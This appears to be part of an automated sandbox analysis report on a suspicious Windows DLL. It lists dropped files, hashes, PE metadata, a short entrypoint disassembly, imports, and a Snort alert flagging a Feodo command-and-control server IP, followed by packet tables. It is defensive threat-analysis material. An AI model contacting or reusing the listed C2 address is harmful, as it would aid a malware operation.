File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	132036
Entropy (8bit):	7.970725346390297
Encrypted:	false
SSDEEP:	3072:k5C9gDW6uYdwgzrMMr+ho6ooY+c1A6Vc4CMeP68bmLRyZRPz2RS4:k5C4W6uYVMMSooJc1A6Vc4Ai8bkwPz2P
MD5:	200AE005B4441172162151894C9D339C
SHA1:	6B595F5CDA3255DCE43662B2579C0615D19A7A4E
SHA-256:	C4804BC0416D9A943A740BBA9E81C61E6486B5A9A0F177200EC72A8C25A6FA6E
SHA-512:	B75D9A9F395541D99BF92182E7DD6D6B0100AE525235EE3F0C73E8F88C80B0FCE3F0C000794B34161F9079E7AF6CC747EBC0A148C89EABB1D3205DE8F890825B
Malicious:	false
Preview:	......JFIF.............(ICC_PROFILE...............mntrRGB XYZ ............acsp.......................................-....................................................desc.......trXYZ...d....gXYZ...x....bXYZ........rTRC.......(gTRC.......(bTRC.......(wtpt........cprt.......<mluc............enUS...X.....s.R.G.B................................................................................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para..........ff......Y.......[........XYZ ...............-mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C.......................................................................p.n..............................................K..........................!..1.AQa."q.......2..#...BR$..3br.4CS..%5.....c...................................K......................!...1A.Qaq.."......2....B.#.R.$3br..%4CS..c..&DUs..............?..zu.A7.9I.3K.....8.!.YECR........8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\55a804ab-e5c6-4b97-9319-86263d365d28[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2955
Entropy (8bit):	4.796538193381466
Encrypted:	false
SSDEEP:	48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAmHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AyQshjUjVjx4
MD5:	8FCB3F61085635194CE5A73516DE39F9
SHA1:	4EF7BB8362EE512BD497C48C168085738EE010C3
SHA-256:	CEC95B7811CBF927FD338529A08F6B1BBF12F5B78459D07D15DE92C60C12DD64
SHA-512:	DB60AF665E02724F527C6781396105C456E56D23691A64F57BDD452C0568EF43DE36F63D8B18702A5C5A6FA29C9C16CD6ADEBB74E28BA94AF7291EAC3095861D
Malicious:	false
Preview:	{"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\627[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1200x627, frames 3
Category:	dropped
Size (bytes):	49885
Entropy (8bit):	7.778439483983189
Encrypted:	false
SSDEEP:	768:X6BlqOV3uNPt/3bafkcH6U68i61kNhtIHNiZi1g9Bs7iyMN4HwWBCk:X6BlqOV3uNP1afnH2+kN4tIZ4HwWEk
MD5:	6A751184E662EB36D93D61EB163565ED
SHA1:	373557DF3A076AA3D67F787407990A9CE87A26F8
SHA-256:	F40828D75BAFB2DF4B9F1F8D9907C9C54A228429A81A9067EFEFDC63907AB164
SHA-512:	0EDA010422F6A84C74548540637CD4C36B15412E537A3D6C9756E89196EF4D4A9EA9706C0906C68562FA77C8C721358847D88A23AF7A0176DECB6C722A2EC7DC
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......s...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(....J(=(..QE .(...(...(...CKA...5i...h.(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..P..LR.@...R.@......#@..... ..QE...QE........QE.H>....L.t})i..-1..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.017876763793381
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DAQzQ6FyNs.dll
File size:	646656
MD5:	c6312fbf8d344014804200a3101a6379
SHA1:	f5733b3950ab0a0b25c80a81b4b56af8083108e7
SHA256:	91c09eab3e0328874c32b21673a61d4e591267c537a9d1cafa8ae92350323073
SHA512:	0e412ceb342c1a66253002083bea9c8705daec00d6c639cab273f84947c781057fcf7d065c43c60a88b37a37b3a8bcfa7c626d91e2f410a8d8f11399ebb2d61c
SSDEEP:	6144:DqLleYHAIfnUrxLd1DA55MBddyjcvK567iIye:DqLl7eLjUzOyjg57xye
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..O2V.O2V.O2V.$1W.O2V.$7WLO2V.$6W.O2V.$3W.O2V.O3V.O2V.:6W.O2V.:1W.O2V.:7W.O2Vp:7W.O2Vp:2W.O2Vp:0W.O2VRich.O2V...............

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005ea3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x615709B4 [Fri Oct 1 13:14:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d2b6167ab1ec809d3fbc779dee9ce091

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FFA1088E4C7h
call 00007FFA1088E566h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FFA1088E373h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FFA1088E003h
push 10017964h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FFA1088F385h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FFA10889DB4h
push 100175FCh
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FFA1088F368h
int3
jmp 00007FFA10891527h
push ebp
mov ebp, esp
sub esp, 14h
and dword ptr [ebp-0Ch], 00000000h
lea eax, dword ptr [ebp-0Ch]
and dword ptr [ebp-08h], 00000000h
push eax
call dword ptr [1001201Ch]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [10012018h]
xor dword ptr [ebp-04h], eax
call dword ptr [10012014h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [10012010h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov ecx, dword ptr [1009E064h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FFA1088E4C6h
test esi, ecx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x17ec0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f10	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0x1040	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16d8c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x16da8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x114	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10636	0x10800	False	0.55595999053	data	6.47361283612	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x6542	0x6600	False	0.411726409314	data	4.86775828066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x86410	0x85a00	False	0.491295895697	data	4.35869014736	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0x1040	0x1200	False	0.709635416667	data	6.20834379358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

VirtualAlloc, VirtualProtect, GetProcAddress, LoadLibraryA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RaiseException, RtlUnwind, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, HeapReAlloc, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, GetStringTypeW, HeapSize, CloseHandle, CreateFileW, WriteConsoleW, DecodePointer

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x100010b0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/02/21-18:14:01.795842	TCP	2404336	ET CNC Feodo Tracker Reported CnC Server TCP group 19	49860	443	192.168.2.5	46.99.188.223

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2021 18:13:17.755810022 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.755855083 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.755927086 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.759228945 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.759299994 CEST	443	49776	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.759363890 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.759390116 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.759421110 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.760200977 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.760220051 CEST	443	49776	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.798450947 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.798554897 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.802203894 CEST	443	49776	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.802347898 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.803390026 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.803742886 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.803845882 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.804080009 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.807578087 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.807598114 CEST	443	49776	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.808012962 CEST	443	49776	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.808073044 CEST	49776	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.825896978 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.825978994 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.825998068 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.826049089 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.826057911 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.826102018 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.827152967 CEST	49775	443	192.168.2.5	104.20.184.68
Oct 2, 2021 18:13:17.827177048 CEST	443	49775	104.20.184.68	192.168.2.5
Oct 2, 2021 18:13:17.953464031 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.953504086 CEST	443	49787	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:17.953577995 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.961568117 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.961592913 CEST	443	49787	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:17.964668036 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.964709997 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:17.964796066 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.974081039 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:17.974114895 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.014065027 CEST	443	49787	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.014138937 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.014209986 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.014283895 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.019897938 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.019913912 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.020231962 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.020245075 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.023500919 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.025711060 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.025736094 CEST	443	49787	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.025739908 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.026578903 CEST	443	49787	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.026647091 CEST	49787	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068025112 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068078995 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068118095 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068145990 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068161011 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068193913 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068217993 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068223953 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068265915 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068301916 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068306923 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068316936 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068337917 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068361044 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068366051 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068377972 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068423033 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.068429947 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:18.068469048 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.082362890 CEST	49788	443	192.168.2.5	104.26.6.139
Oct 2, 2021 18:13:18.082395077 CEST	443	49788	104.26.6.139	192.168.2.5
Oct 2, 2021 18:13:23.698561907 CEST	49821	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.698610067 CEST	443	49821	87.248.118.23	192.168.2.5
Oct 2, 2021 18:13:23.698698044 CEST	49821	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.700552940 CEST	49822	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.700589895 CEST	443	49822	87.248.118.23	192.168.2.5
Oct 2, 2021 18:13:23.700679064 CEST	49822	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.702001095 CEST	49821	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.702029943 CEST	443	49821	87.248.118.23	192.168.2.5
Oct 2, 2021 18:13:23.722686052 CEST	49822	443	192.168.2.5	87.248.118.23
Oct 2, 2021 18:13:23.722708941 CEST	443	49822	87.248.118.23	192.168.2.5
Oct 2, 2021 18:13:23.749886036 CEST	49825	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.749912977 CEST	443	49825	151.101.1.44	192.168.2.5
Oct 2, 2021 18:13:23.750087023 CEST	49826	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.750123024 CEST	443	49826	151.101.1.44	192.168.2.5
Oct 2, 2021 18:13:23.750184059 CEST	49826	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.750531912 CEST	49827	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.750559092 CEST	443	49827	151.101.1.44	192.168.2.5
Oct 2, 2021 18:13:23.750612020 CEST	49827	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.751457930 CEST	49826	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.751480103 CEST	443	49826	151.101.1.44	192.168.2.5
Oct 2, 2021 18:13:23.751528025 CEST	49825	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.751545906 CEST	49825	443	192.168.2.5	151.101.1.44
Oct 2, 2021 18:13:23.751553059 CEST	443	49825	151.101.1.44	192.168.2.5
Oct 2, 2021 18:13:23.753030062 CEST	443	49821	87.248.118.23	192.168.2.5
Oct 2, 2021 18:13:23.753109932 CEST	49821	443	192.168.2.5	87.248.118.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2021 18:13:04.678702116 CEST	61805	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:04.699965000 CEST	53	61805	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:11.697292089 CEST	54795	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:11.715691090 CEST	53	54795	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:13.161844969 CEST	49557	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:13.205729961 CEST	53	49557	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:13.783262014 CEST	61733	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:13.797555923 CEST	53	61733	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:14.284991026 CEST	65447	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:14.300421953 CEST	53	65447	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:14.325361013 CEST	52441	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:14.343334913 CEST	53	52441	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:17.016222000 CEST	62176	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:17.050605059 CEST	53	62176	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:17.621824980 CEST	59596	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:17.636615992 CEST	53	59596	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:17.691049099 CEST	65296	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:17.712910891 CEST	53	65296	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:17.911060095 CEST	63183	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:17.950910091 CEST	53	63183	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:18.537146091 CEST	60151	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:18.552196980 CEST	53	60151	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:19.687381029 CEST	56969	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:19.702475071 CEST	53	56969	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:21.779231071 CEST	55161	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:21.800718069 CEST	53	55161	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:22.297601938 CEST	54757	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:22.316890001 CEST	53	54757	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:22.686038971 CEST	49992	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:22.699258089 CEST	53	49992	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:23.678705931 CEST	60075	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:23.691838026 CEST	53	60075	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:23.721168041 CEST	55016	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:23.727344036 CEST	64345	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:23.740578890 CEST	53	55016	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:23.740819931 CEST	53	64345	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:35.261374950 CEST	59736	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:35.261476994 CEST	51058	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:35.261558056 CEST	52636	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:35.277551889 CEST	53	51058	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:35.277853966 CEST	53	52636	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:35.277878046 CEST	53	59736	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:37.504342079 CEST	57128	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:37.522453070 CEST	53	57128	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:39.422077894 CEST	54791	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:39.438313007 CEST	53	54791	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:41.677243948 CEST	50463	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:41.700373888 CEST	53	50463	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:42.724642038 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:42.725501060 CEST	50463	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:42.738468885 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:42.738962889 CEST	53	50463	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:43.742916107 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:43.769198895 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:43.793549061 CEST	50463	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:43.806560040 CEST	53	50463	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:44.767749071 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:44.781476974 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:45.792505980 CEST	50463	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:45.805608034 CEST	53	50463	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:46.777007103 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:46.790735006 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:47.180272102 CEST	58530	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:47.194610119 CEST	53	58530	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:49.813590050 CEST	50463	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:49.829355955 CEST	53	50463	8.8.8.8	192.168.2.5
Oct 2, 2021 18:13:50.817491055 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:13:50.831150055 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:05.076311111 CEST	53813	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:05.089587927 CEST	53	53813	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:05.968528032 CEST	63732	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:05.981781006 CEST	53	63732	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:07.727545977 CEST	57344	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:07.745712996 CEST	53	57344	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:13.706814051 CEST	54450	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:13.727319002 CEST	53	54450	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:13.730823040 CEST	59261	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:13.777357101 CEST	53	59261	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:13.779966116 CEST	57151	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:13.899030924 CEST	53	57151	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:13.902286053 CEST	59413	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:13.928888083 CEST	53	59413	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:13.932503939 CEST	60516	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:13.960172892 CEST	53	60516	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:19.707278013 CEST	51649	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:19.721473932 CEST	53	51649	8.8.8.8	192.168.2.5
Oct 2, 2021 18:14:26.797075033 CEST	65086	53	192.168.2.5	8.8.8.8
Oct 2, 2021 18:14:26.810300112 CEST	53	65086	8.8.8.8	192.168.2.5
